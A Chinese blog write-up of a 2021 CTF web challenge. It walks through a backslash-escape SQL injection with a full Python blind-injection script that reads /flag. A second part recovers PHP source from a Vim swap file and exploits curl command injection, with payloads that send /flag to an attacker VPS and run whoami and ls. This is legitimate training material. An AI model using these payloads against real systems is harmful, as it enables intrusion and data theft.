某单位2021年CTF初赛Web4-Sqlnm

已于 2022-11-30 15:59:50 修改
阅读量3.4k 收藏 1
点赞数 1
文章标签: web安全 安全
于 2021-11-29 10:18:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sorryagain/article/details/121602990
版权

Sqlnm

这是一道Web题,访问界面如下:
在这里插入图片描述
查看源代码,目录扫描,BP抓包都没有发现什么线索,正常登录的报文是这样:

在这里插入图片描述
由题目提示猜想可能是SQL注入,尝试输入单引号,但是被过滤了:

在这里插入图片描述
这里尝试了宽字节注入、00截断、unicode编码都无法绕过

%bf%27 %df%27 %aa%27 //宽字节注入

最后发现可以通过输入反斜杠\来转义username的第二个单引号,将username的第二个单引号转义为普通的单引号字符,而username的第一个单引号和password的第一个单引号闭合,Payload如下:

username=admin\&password=or/**/1#

所以最终后台执行的SQL大约是这个亚子,去查询了用户名为admin'&password=的用户,而password字段是我们可以控制的,存在SQL注入:

select * from users where username='admin\'&password='or/**/1#'

修改Payload,回显报错不同,so,这是一道基于布尔的盲注。

在这里插入图片描述
在这里插入图片描述
然后就可以开始愉快的coding了:

import requests

session = requests.session()

burp0_url = ""
burp0_cookies = {"PHPSESSID": "615d4232a3f154b4ea54eaa8a56237ba"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://ad2a722d-d5af-43fd-b4b8-7840de2a24d0.machine1.dasctf.com:20000", "Connection": "close", "Referer": "http://ad2a722d-d5af-43fd-b4b8-7840de2a24d0.machine1.dasctf.com:20000/", "Upgrade-Insecure-Requests": "1"}

for i in range(1, 40):
    for c in range(45, 127):
        username = 'admin\\'
        # password = f'or/**/ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x7573657273),{i},1))={c}#'
        # password = f'or/**/ascii(substr((select/**/group_concat(username)/**/from/**/users),{i},1))={c}#'
        password = f'or/**/ascii(substr(load_file("/flag"),{i},1))={c}#'
        burp0_data = {"username": username, "password": password}
        r = session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
        if '登录成功' in r.content.decode():
            print(chr(c), end='')
            break

这里还有几个点:

  1. 本题还过滤了空格,采用注释符/**/绕过。
  2. 爆破列名时需要将表明拼接到WHERE语句上,但是本题过滤了单引号,因此将表名转为16进制拼接。
select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x7573657273
  1. 爆破字段时,字段值为flagin/flag,使用mysql的load_file()函数读取系统文件,参数使用双引号来绕过单引号。
load_file("/flag")

以上是我第一次做这道题时,直接用SQL盲注解的。一年之后又遇到这道题,发现其实本题应该后面还有一个Vim源码泄露,这里再补充一下Vim源码泄露的解法。

其实我认为在比赛中解题方法不重要,条条大路通罗马,只要能拿到flag都证明你突破了一定的限制,至于用什么方法见仁见智。但在平时积累中,应该去掌握尽可能多的攻击手段,扩充自己的武器库,这样才能在比赛时游刃有余,为实战打下基础。

回归正题,因为本题存在SQL注入,当采用如下Payload登录成功时,跳转页面:

username=admin\&password=or/**/1#

在这里插入图片描述

(我第一次做的时候还在奇怪,为啥给了这个页面。。)

这里是一个Vim的源码泄露,访问/.curl.php.swp页面,下载文件,并使用以下命令恢复临时文件:

vim -r .curl.php.swp

得到文件源码:

<?php
	error_reporting(0);
	session_start();
	
	if(isset($_SESSION)&&$_SESSION['username']==1) {
	        $url=$_GET['url'];
	        if(empty($_GET['url'])){
	                echo("?url=www.weibo.com<br><img src=4.jpg>");
	        }else{
	                $url = 'http://www.weibo.com'.$url;
	                echo system('curl '.$url);
	        }
	}
	else{
	        die("请先登录".'<script language=javascript>window.location.href="index.php"</script>');
	}
?>

我们请求的url参数会被拼接在http://www.weibo.com后面,作为curl命令的参数执行,可以使用@截断,使用-d参数读取文件内容:

/curl.php?url=@xx.xx.xx.xx:xx -d @/flag

VPS上起监听:

在这里插入图片描述

或者也可以直接执行命令:

/curl.php?url=@xx.xx.xx.xx:xx?a=`whoami`

VPS上查看:

在这里插入图片描述

查看目录的话,只能看到返回一个文件,为避免换行符阶段,使用base64编码即可:

/curl.php?url=@xx.xx.xx.xx:xx?a=`ls /|base64`
2ha0yuk7on.
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
某信息安全攻防大赛周周练考核(二) Writeup By 2ha0yuk7on
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
12-01 1421
某信息安全攻防大赛周周练考核(二) Writeup By 2ha0yuk7on
[CISCN2019 总决赛 Day2 Web1]Easyweb1
Mrs_H的博客
10-22 488
一.前言 在之前的文章中我提到最近一直在做sql注入相关的东西,也在一直做sql注入有关的题目。但是,事实上很多赛题他们的考点并不单一,往往需要结合着其他的知识,才能够拿到想要的结果。下面这道题就是我刚才所说的典型,虽然考的不难,但是足够说明当前sql题目的走向了。 二.正文 我们首先打开环境看到如下页面。 emmm,一个花里胡哨的登陆界面。尝试输入了很多用户名和密码组合,但是都不对。那就去扫一下目录,发现该网站存在一个robots.txt 这个robots文件中的内容就是在提示我们,该网站含有备份文件
数据库系统基础速成—SQL代码查询语言篇
Lion_Dreams的博客
05-24 2932
本文写了一些常用的SQL代码,语句,几乎包含了所有基础的SQL代码,只有少数几个不常用的并未列出。其次为了使代码框中的文字更加清晰,代码框中的文字并没有使用注释符进行注释。1、基本数据类型 2、创建数据库关系(create) 3、主键声明(primary key) 4、外键声明(foreign key) 5、约束语句之不允许为空值约束(not null) 6、关系中添加(插入)数据(insert into) 7、删除所有元组(表中所有行的数据)(delete from)删除一个关系
MYSQL sql的技巧与避坑
热门推荐
w907645377的博客
07-12 1万+
mysqlsql的一些技巧和坑
NSSCTF刷题笔记web4——[SWPUCTF 2021 新生赛]easy_sql
最新发布
qq_45692883的博客
01-18 509
通过1' and 1=1 --+ 和 1' and 1=2 --+,判断存在字符型注入。最后是枯燥的在information_schema库中找对应的表名和字段名。传入1' order by 4 --+爆错,判断只有三个字段数。查看源代码中的提示,先传入一个1试试看。爆表,test_tb,users。通过联合查询判断我们的注入点。爆库,test_db。
CTF-WEB总结(四-题目来源i春秋)
weixin_41038905的博客
05-07 5260
Web总结: 1.网页源代码查看 即使浏览器不设置 直接访问此链接也可以看到原代码,后来发现其他网页也是如此, 所以破解方法有三个 一个是直接F12查看元素可以看到 一个是设置浏览器关闭js 一个是直接在链接前加view-source    注意看原代码的链接:view-source:http://159.138.137.79:55803/ 2.直接在链接后加/robots.txt,这边记录了爬虫...
SQL--常见SQL命令
NMZLduiduidui的博客
12-20 521
1.SQLSELECT语句 SELECT 语句用于从数据库中选取数据。 SQL SELECT 语句 SELECT 语句用于从数据库中选取数据。 结果被存储在一个结果表中,称为结果集。 SQL SELECT 语法 SELECTcolumn_name,column_name FROMtable_name; 与 SELECT * FROMtable_name; 2.SQ...
[转]sql,N/$/#/@的含义和作用
weixin_30577801的博客
11-30 1067
declare @sql nvarchar(4000)set @sql= N'select @TotalRecords=count(*) from ' + N'(' + @sqlFullPopulate + N') a 'EXEC sp_executesql @sql,N'@TotalRecords int output', @TotalRecords output 问题:@sql= 后面有...
Linux 没有定义的符号 调试方法 nm命令
03-11 1598
nm命令[在GNU C语言库提供的内容中,有接口可以用来做这件事。用下面的命令查看:nm -D /lib/libc.so.6 | grep log]nm命令还是比较简单而且强大的。它用来列出一个目标文件中的各种符号。符号的种类很多,以下是一些常见的符号类型 nm输出字符含义RRead
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
CTF-网络挑战使用PHP在Web中进行CTF挑战链接: :
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
ctfweb攻防工具-御剑1.5.7z
04-06
御剑1.5版本
sql优化
又是重名了
04-20 670
然后是这个sql,如果ROBXDJ_NM没有值的话最开始的sql求和也不再需要了,事情到这里结束了就结束了,但是当我放到测试环境服务器的时候,发现执行时间还是挺长的,求max以及SELLERTAXPAYERID || ‘,’ || ROBXDJ_BZDWID这个查询还是消耗时间,本来是因为sql影响所以不得已使用了max函数,现在使用了java就没有必要了,直接jpa求出对应的值,按照SELLERTAXPAYERID 排序,取第一个就好啦。可以看出来大概就是这个东西影响的执行时间,然后在分步的去处理条件。
SQL注入原理和 SQLMAP 的使用
weixin_44603865的博客
08-07 288
SQL 注入
Linux nm 命令
weixin_34337381的博客
12-24 576
nm [‘-a’|‘--debug-syms’] [‘-g’|‘--extern-only’] [‘-B’] [‘-C’|‘--demangle’[=style]] [‘-D’|‘--dynamic’] [‘-S’|‘--print-size’] [‘-s’|‘--print-armap’] [‘-A’|‘-o’|‘...
CTFWeb各种题目的解题姿势
05-25
Web题型是CTF中常考题型之一,它将实际渗透过程中的技术技巧转化为CTF赛题,主要考察选手在Web渗透技术方面的能力,由于Web渗透涉及的知识点较多,知识面比较广泛,因此系统的总结和练习Web类题,是快速掌握出题人思路的一种有效的方法。
CTFHub 命令注入-无过滤
07-25
CTFHub 命令注入-无过滤是一个题目,它的源代码中存在一个命令注入漏洞。在这个题目中,用户可以通过输入IP地址执行ping命令。\[1\]由于没有采用过滤,用户可以直接进行命令拼接,例如输入"192.168.43.222;ls"可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值